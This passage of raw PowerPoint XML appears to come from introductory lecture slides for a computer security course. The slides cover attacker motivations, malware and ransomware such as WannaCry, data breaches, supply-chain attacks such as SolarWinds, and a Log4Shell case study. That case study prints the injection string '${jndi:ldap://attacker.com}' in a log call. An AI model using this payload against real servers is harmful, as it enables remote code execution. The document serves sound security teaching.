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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="387" r:id="rId4"/>
    <p:sldId id="401" r:id="rId5"/>
    <p:sldId id="388" r:id="rId6"/>
    <p:sldId id="359" r:id="rId7"/>
    <p:sldId id="391" r:id="rId8"/>
    <p:sldId id="426" r:id="rId9"/>
    <p:sldId id="385" r:id="rId10"/>
    <p:sldId id="386" r:id="rId11"/>
    <p:sldId id="389" r:id="rId12"/>
    <p:sldId id="370" r:id="rId13"/>
    <p:sldId id="373" r:id="rId14"/>
    <p:sldId id="394" r:id="rId15"/>
    <p:sldId id="413" r:id="rId16"/>
    <p:sldId id="374" r:id="rId17"/>
    <p:sldId id="296" r:id="rId18"/>
    <p:sldId id="425" r:id="rId19"/>
    <p:sldId id="372" r:id="rId20"/>
    <p:sldId id="375" r:id="rId21"/>
    <p:sldId id="427" r:id="rId22"/>
    <p:sldId id="431" r:id="rId23"/>
    <p:sldId id="432" r:id="rId24"/>
    <p:sldId id="424" r:id="rId25"/>
    <p:sldId id="428" r:id="rId26"/>
    <p:sldId id="429" r:id="rId27"/>
    <p:sldId id="433" r:id="rId28"/>
    <p:sldId id="297" r:id="rId29"/>
    <p:sldId id="298" r:id="rId30"/>
    <p:sldId id="380" r:id="rId31"/>
    <p:sldId id="423" r:id="rId32"/>
    <p:sldId id="430" r:id="rId33"/>
    <p:sldId id="434" r:id="rId34"/>
    <p:sldId id="382" r:id="rId35"/>
    <p:sldId id="400" r:id="rId36"/>
    <p:sldId id="435" r:id="rId37"/>
    <p:sldId id="403" r:id="rId38"/>
    <p:sldId id="390" r:id="rId39"/>
    <p:sldId id="404" r:id="rId40"/>
    <p:sldId id="405" r:id="rId41"/>
    <p:sldId id="406" r:id="rId42"/>
    <p:sldId id="407" r:id="rId43"/>
    <p:sldId id="408" r:id="rId44"/>
    <p:sldId id="410" r:id="rId45"/>
    <p:sldId id="411" r:id="rId46"/>
    <p:sldId id="412" r:id="rId47"/>
    <p:sldId id="395" r:id="rId48"/>
    <p:sldId id="377" r:id="rId49"/>
    <p:sldId id="396" r:id="rId50"/>
    <p:sldId id="397" r:id="rId51"/>
    <p:sldId id="376" r:id="rId52"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9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4669"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="130" d="100"/>
          <a:sy n="130" d="100"/>
        </p:scale>
        <p:origin x="208" y="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BA-5645-8581-391093ECE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BA-5645-8581-391093ECE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BA-5645-8581-391093ECE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BA-5645-8581-391093ECE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93-624A-9445-7F5F613A95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Paper document Loss</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Hacking or Malware</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Stolen/lost device</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Accidental Disclosure</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Insider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1739</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2589</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>1421</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1809</c:v>
                </c:pt>
                <c:pt idx="4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D-7348-8ECE-F5664A05F1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DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> service from hack-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>shop.org.ru</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Source:   http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>www.defcon.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/images/defcon-15/dc15-presentations/dc-15-holt.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Mobile bot-nets:   more reliable because phones are always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(2013):  140M CC stolen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNC: democratic national committee (John Podesta)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9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Firewalls,  EDR (endpoint protection and response),  DLP (data leak protection),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SOAR (Security Orchestration, Automation, and Response)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Technically:  there is an intermediate round </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>beween</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> victim and attacker to resolve an LDAP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6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Properly signed software update.   Sunburst registers with CCC via HTTP (some stealth:  protocol is called Orion Improvement Protocol).   Downloads executables and runs them on infected host.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Malware source file is stored encrypted, only decrypted when given to compiler.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>taskhostsvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> also checks that the hash of file being replaced is the expected one (i.e., file was not updated by company).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1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attackers compromise SolarWinds in the first place?   Unknown:  investigation is ongoing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software providers are constantly under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05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PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Python package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11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www.iqt.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bewear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-python-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>typosquatting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-is-about-more-than-typos/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CuPy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cupy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/issues/4787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531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segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty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readings on the course web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9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2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9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9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Creator of UNIX,   the B programming language,  UTF-8,  and much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5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ShadowHammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   exploits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ASUS Live Update which is used to update BIOS/UEFI on Asus computers.  The attack used a backdoored version of Live Update.   The attack took place between June and Nov. 2018.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CVE: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Vulnerabilities and Exposures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Remainder colors are:  Adobe Flash and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Duff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3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9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5597-9FA6-3941-B7D8-95980EC6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oogle Shape;11;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E241FA18-28A0-8E42-B4DE-3DD1DC47D8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4"/>
            <a:ext cx="8556171" cy="381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68580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28700" marR="0" lvl="2" indent="-26860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714500" marR="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57400" marR="0" lvl="5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400300" marR="0" lvl="6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086100" marR="0" lvl="8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2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27751" y="4942417"/>
            <a:ext cx="700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CS155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386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896269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motivates attackers?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C8059-F669-A645-A809-442AB6871FB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069020" y="4095750"/>
            <a:ext cx="3417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 economics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839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Why compromise end user machines?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     1.  Steal user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458200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keylog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for banking passwords,   corporate passwords,   gaming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwds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Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(and many like it)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n-ea"/>
              </a:rPr>
              <a:t>Bank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mechanism used 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err="1"/>
              <a:t>Zbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and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272" y="4604800"/>
            <a:ext cx="3550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Adversary-in-the-Browser (AITB)</a:t>
            </a:r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financial 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8866B-DCBC-3A44-BDED-61D355C28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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="489155" y="1047750"/>
            <a:ext cx="2662719" cy="3396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1504950"/>
            <a:ext cx="4343400" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95305"/>
              <a:gd name="adj2" fmla="val -5066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records banking passwords via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keylogger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 via spam email and hacked web sites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maintains access to PC for future installs</a:t>
            </a:r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99C0-8D86-BB40-AC4B-D08EAE2C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attacks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2327-5062-674B-AF5A-55C4875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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FinSpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Works on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>iOS and Android   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(and Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>once installed:  collects contacts,  call history,  geolocation, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	texts,  messages in encrypted chat apps, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>How installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?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Android pre-2017:   links in SMS / links in E-mail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iOS and Android post 2017:   physical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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>Ransomware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98275" y="9581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/>
              <a:t>a worldwide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4D56-6704-3841-A0D4-7AC79F77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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="742950"/>
            <a:ext cx="2684549" cy="426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B2785-5066-224D-BFEC-225A0C58B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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2913149" y="742950"/>
            <a:ext cx="1434407" cy="426076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CADC5A-9671-A347-9485-38919B79223C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1539830"/>
            <a:ext cx="4479175" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67608"/>
              <a:gd name="adj2" fmla="val -500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Worm spreads via a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SMB  (port 445)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Apr. 14, 2017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Eternalblue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released by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ShadowBrokers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12, 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Worm detected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(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> weeks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weaponize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440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37648" y="2048452"/>
            <a:ext cx="3846945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WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>   ransomware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-31750"/>
            <a:ext cx="7100455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3714750"/>
            <a:ext cx="39624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1" y="2571750"/>
            <a:ext cx="2590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2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14B9C-6226-E141-8FB9-81D8279D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9" y="1417168"/>
            <a:ext cx="5780302" cy="2976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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Bitcoin Mining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3AD99-8CD1-9C44-B875-5898D65BC58A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5255" y="4854773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3D29B-EC4F-E74D-BD39-48C5819F90E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1657350"/>
            <a:ext cx="279461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Examples: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Trojan.Win32.Miner.bbb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trojan.Win32.Miner.ays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Trojan.JS.Miner.m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Trojan.Win32.Miner.gen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D31DC-A70F-2E48-9B78-8220622EB440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1114335"/>
            <a:ext cx="16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affected users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128348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Why compromise end user machines?  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>     4.  IP address and bandwidth stealing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686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Attacker’s goal:   look like a random Internet user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Use the IP address of infected machine or phone for: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Spam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    (e.g. the storm botnet)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Spamalytics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>1:12M  pharma spams leads to purchase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b="1" dirty="0"/>
              <a:t>Denial of Service:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Services:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 hour (20$),   24 hours (100$)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1776"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Click fraud  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Clickbot.a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7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More devastating: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>server-side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915400" cy="424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(1) Data theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   credit card numbers,   intellectual property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Example:   Equifax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(July 2017)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,  ≈ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>143M “customer” data impacted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Exploited known vulnerability in Apache Struts (RCE)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many similar attacks since 2000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(2) Political motivation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Election:  attack on DNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(2015)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ukraine attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(2014: election,   2015,2016: power grid,   2017: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>NotPetya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>,  … 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(3) Infect visiting users</a:t>
            </a:r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CAA0-5F4B-BE4B-80B8-EB8DBEDB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 many server-side Breaches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4BBA-69B5-5F44-8B80-E44559CD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4267200" cy="396240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/>
              <a:t>Typical attack steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: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Foothold: initial breach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Internal reconnaissance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Lateral movement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Data extraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1176"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Exfiltration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AE0522-C87B-264E-AC78-2D5D4C3B2B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4809559" y="1504950"/>
            <a:ext cx="4267200" cy="3048000"/>
            <a:chOff x="4724400" y="1657350"/>
            <a:chExt cx="4182041" cy="30480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5DBA8111-09CB-4D47-8B9F-1C53A7480BB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4724400" y="1657350"/>
              <a:ext cx="457200" cy="3048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A7C976-CD00-5F42-8420-842D4294CFD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5202157" y="2495550"/>
              <a:ext cx="370428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Security tools available to</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>try and stop each step (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
                <a:t>kill chain</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>)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will discuss tools during course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… but no complete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6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4D2-2EB2-924A-96B9-8803A6B2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CBF6-ED26-C74B-A98B-EEF5052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095750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Course web site:      https://cs155.Stanford.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Profs:   Dan Boneh  and  Zakir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Durumeric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Three programming projects (pairs) and two written </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>homeworks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/>
              <a:t>Project #1 posted on Wednesday.   Please attend first section!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EdDiscussions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gradescope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic 72 hour extension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C604F4-B846-1846-897C-263623F9FCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="819150"/>
            <a:ext cx="3733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0017-7083-A648-BB97-EE6902B9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/>
              <a:t>Case study 1:  Log4Shell     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>(2021)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A77F-13AF-3C44-8ED4-6EBE7174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9150"/>
            <a:ext cx="8686800" cy="1447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Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  a popular logging framework for Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Nov. 21:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   vulnerability in Log4j 2 enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote Code Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over 7000 code repositories affected and many Java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3706A-A38F-0E48-887B-A98C5917F88E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116422" y="2343150"/>
            <a:ext cx="671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bug:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Log4j can load and run code to process a log request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2619FD-11CD-754D-8C81-E1416B05BC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="3177404"/>
            <a:ext cx="6049853" cy="369332"/>
            <a:chOff x="1447800" y="3515868"/>
            <a:chExt cx="6049853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2F5AAC-BD58-0E44-8568-B7E0A328C62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867150"/>
              <a:ext cx="6049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47D3E8-E1EA-5746-B97D-C18DC2661C6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2059866" y="3515868"/>
              <a:ext cx="4801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message containing:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>${</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>jndi:ldap</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>attacker.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>}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7E9C16-3F02-3141-9A96-184537123810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495799" y="3640407"/>
            <a:ext cx="411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log.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“… ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jndi:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}…”)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F9EA95-6299-C04A-B834-78C7816E9315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="3845154"/>
            <a:ext cx="6049853" cy="369332"/>
            <a:chOff x="1447800" y="4242586"/>
            <a:chExt cx="6049853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3D0529-4E47-4244-9BD9-A7258B331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800" y="4552950"/>
              <a:ext cx="6049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104B3-38D1-E44C-A7ED-156EECA974E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1769476" y="4242586"/>
              <a:ext cx="2726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LDAP query then HTTP GET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80685-CEFE-7E43-A83B-93D8DF1AEE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="4190985"/>
            <a:ext cx="5486400" cy="369332"/>
            <a:chOff x="1447800" y="3515868"/>
            <a:chExt cx="5486400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33BB2A-E6D9-E946-894F-183EC28E9FD5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3867150"/>
              <a:ext cx="5486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A36077-9D7C-6545-8660-D41BD64A7E35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="3515868"/>
              <a:ext cx="2034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Malicious Java code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425AD39-E13C-5143-AE5E-1831FE61449F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929336" y="4324350"/>
            <a:ext cx="1600200" cy="3799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 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AA0D9D-4420-F448-A7E2-6F3B7F0A4DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
